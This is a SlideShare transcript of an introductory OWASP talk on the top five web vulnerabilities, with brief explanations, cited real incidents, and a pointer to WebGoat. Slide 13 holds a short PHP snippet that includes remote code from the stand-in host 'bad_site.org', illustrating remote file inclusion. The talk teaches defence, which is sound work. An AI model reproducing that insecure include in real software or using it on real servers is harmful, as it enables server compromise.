Hacker’s Secrets Sharmishtha Gupta [email_address]
Agenda <ul><li>What is OWASP? </li></ul><ul><li>Web security vs Network security </li></ul><ul><li>OWASP Top 5 </li></ul><...
What is OWASP? Web security vs Network security OWASP Top 5 <ul><li>Open Web Application Security Project </li></ul><ul><u...
What is OWASP? Web security vs Network security OWASP Top 5 <ul><li>Global Community </li></ul><ul><li>Local Bangalore Cha...
What is OWASP? Web security vs Network security OWASP Top 5 <ul><ul><ul><li>Network Security </li></ul></ul></ul><ul><li>C...
What is OWASP?  Web security vs Network security OWASP Top 5 <ul><li>Web Security </li></ul><ul><li>Network is already acc...
What is OWASP? Web security vs Network security OWASP Top 5 <ul><li>Top 5 webapp vulnerabilities </li></ul><ul><ul><li>XSS...
XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF ) <ul><li>Whe...
XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF ) <ul><li>A r...
XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) <ul><li>When...
XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) <ul><li>When...
XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) <ul><li>Most...
XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) <ul><li><?ph...
XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) <ul><li>If a...
XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) <ul><li>Poor...
XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) <ul><li>An a...
XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) <ul><li>Most...
Visit <ul><li>Webgoat from OWASP </li></ul><ul><ul><li>Good to solve the puzzles by learning  vulnerabilities </li></ul></...
 
Upcoming SlideShare
Loading in …5
×

Owasp Hacker Secrets Barcamp

3,036 views

Published on

Introduction of OWASP, OWASP Top 5, Network Security vs App Security and demos with webgoat.

Published in: Education, Technology
1 Comment
1 Like
Statistics
Notes
  • If you like scrapbooking, slideshow presentations, telling stories and sharing images online, then you're gonna absolutely love this:
    http://www.slideshare.net/netbizguru/digital-scrapbook-artist

    And then, why not join the 'Digital Scrapbooking Group' while your at it. It's a great place to show-off and share your new, fantastic-looking creations:
    http://www.slideshare.net/group/digital-scrapbooking

    Take care & play nicely...
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Views
Total views
3,036
On SlideShare
0
From Embeds
0
Number of Embeds
10
Actions
Shares
0
Downloads
151
Comments
1
Likes
1
Embeds 0
No embeds

No notes for slide

Owasp Hacker Secrets Barcamp

  1. 1. Hacker’s Secrets Sharmishtha Gupta [email_address]
  2. 2. Agenda <ul><li>What is OWASP? </li></ul><ul><li>Web security vs Network security </li></ul><ul><li>OWASP Top 5 </li></ul><ul><ul><li>XSS </li></ul></ul><ul><ul><li>Sql Injection </li></ul></ul><ul><ul><li>Malicious File Execution </li></ul></ul><ul><ul><li>Insecure Direct Object Reference </li></ul></ul><ul><ul><li>Cross Site Request Forgery (CSRF) </li></ul></ul>
  3. 3. What is OWASP? Web security vs Network security OWASP Top 5 <ul><li>Open Web Application Security Project </li></ul><ul><ul><li>Mission: An open community focused on web application security </li></ul></ul>
  4. 4. What is OWASP? Web security vs Network security OWASP Top 5 <ul><li>Global Community </li></ul><ul><li>Local Bangalore Chapter: http://www.owasp.org/index.php/Bangalore </li></ul><ul><li>Open source projects and tools to improve web application security </li></ul><ul><li>Open learning resources and forum on web security </li></ul>
  5. 5. What is OWASP? Web security vs Network security OWASP Top 5 <ul><ul><ul><li>Network Security </li></ul></ul></ul><ul><li>Challenge is to restrict access to network and network resources (servers) </li></ul><ul><li>To protect data being exchanged over network from eavesdroppers </li></ul><ul><li>Mostly network layer stuff (packet filtering, firewalls etc) </li></ul>Attacker Web Server
  6. 6. What is OWASP? Web security vs Network security OWASP Top 5 <ul><li>Web Security </li></ul><ul><li>Network is already accessible on port 80 (or other webserver port) </li></ul><ul><li>Challenge is to protect other network resources which are not exposed, e.g. information stored in db, other backend information </li></ul>Compromised Web Server Victim
  7. 7. What is OWASP? Web security vs Network security OWASP Top 5 <ul><li>Top 5 webapp vulnerabilities </li></ul><ul><ul><li>XSS </li></ul></ul><ul><ul><li>Sql Injection </li></ul></ul><ul><ul><li>Malicious File Execution </li></ul></ul><ul><ul><li>Insecure Direct Object Reference </li></ul></ul><ul><ul><li>Cross Site Request Forgery (CSRF) </li></ul></ul>
  8. 8. XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF ) <ul><li>When user provided data is used without validation and/or encoding </li></ul><ul><li>An attacker can execute a script in victim’s browser and hijack important user information without her knowing </li></ul><ul><li>Ex: </li></ul><ul><ul><ul><li>Alice sends a scrap to Bob on Orkut with a scriptlet. </li></ul></ul></ul><ul><ul><ul><li>When Bob opens his scrapbook, everyone in his network is sent spam scraps posing as Bob by the scriptlet. </li></ul></ul></ul>
  9. 9. XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF ) <ul><li>A real example is “Samy worm” on MySpace.com discovered in October, 2005 </li></ul><ul><ul><li>http://namb.la/popular/tech.html </li></ul></ul><ul><li>Demo </li></ul>
  10. 10. XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) <ul><li>When user provided data is sent to an interpreter (here sql) as part of a command or query </li></ul><ul><li>An attacker can trick the interpreter into executing unintended commands or changing data </li></ul><ul><li>Demo </li></ul>
  11. 11. XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) <ul><li>When user provided input is used for executing a remote code or loading local files </li></ul><ul><li>Allows attackers to include hostile code and data; can totally compromise the server </li></ul>
  12. 12. XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) <ul><li>Most common sources of code injection are: </li></ul><ul><ul><li>Dynamic paths/files used in require/include statements </li></ul></ul><ul><ul><li>eval(): A major source of code injection is the improper validation of eval() using user provided inputs. </li></ul></ul>
  13. 13. XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) <ul><li><?php </li></ul><ul><ul><li>//dynamic path </li></ul></ul><ul><ul><li>$_GET['path'] = ‘http://bad_site.org’; </li></ul></ul><ul><ul><li>include &quot;$_GET[‘path’]/header.inc&quot;; </li></ul></ul><ul><li>?> </li></ul>
  14. 14. XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) <ul><li>If a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter </li></ul><ul><li>Attackers can manipulate those references to access other objects without authorization </li></ul>
  15. 15. XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) <ul><li>Poor error handling is the main cause </li></ul><ul><li>Demos </li></ul><ul><ul><li>Bad file inclusion </li></ul></ul><ul><ul><li>Sql connect failure </li></ul></ul>
  16. 16. XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) <ul><li>An attack that forces a logged-on victim’s browser to send a pre-authenticated request to a vulnerable web application </li></ul><ul><li>This can be as powerful as the web application that it attacks </li></ul>
  17. 17. XSS Sql Injection Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) <ul><li>Mostly when source of request is not validated </li></ul><ul><li>Gmail change password CSRF vulnerability disclosed by Vicente on 3 rd Mar 2009 </li></ul><ul><ul><li>http://seclists.org/fulldisclosure/2009/Mar/0029.html </li></ul></ul><ul><li>Demo </li></ul>
  18. 18. Visit <ul><li>Webgoat from OWASP </li></ul><ul><ul><li>Good to solve the puzzles by learning vulnerabilities </li></ul></ul><ul><ul><li>Good hints and solutions </li></ul></ul><ul><ul><li>Download from http://code.google.com/p/webgoat/downloads/list </li></ul></ul>

×